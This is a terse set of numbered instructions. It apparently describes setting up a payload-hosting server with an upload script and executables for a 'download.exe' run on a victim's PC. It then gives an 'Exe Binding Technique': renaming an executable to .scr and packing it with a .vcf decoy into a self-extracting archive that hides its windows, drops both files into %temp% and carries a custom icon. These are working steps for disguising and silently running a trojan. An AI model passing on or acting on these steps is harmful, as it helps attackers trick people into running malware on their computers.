                      
1.	Make a server and make two folders there aaaa inside it bbbb.
2.	Copy uplod.php outside aaaa.
3.	Copy all exe files into aaaa.
4.	Now run any download.exe on client pc .

Exe Binding Technique
1.	Change .exe to .scr
2.	Select both file and right click add to Archive
3.	Archive Format select zip and check Create SFX archive
4.	Advance SFX option ---Update Tab select Extract and update files and overwrite all files
5.	Mode Tab ---Hide all
6.	Add shortcuts ---write----
%temp%\downloader.scr
%temp%\00001.vcf
7.Text and Icon tab ---select logo.ico file 
-----------------------------------------------------------------OK
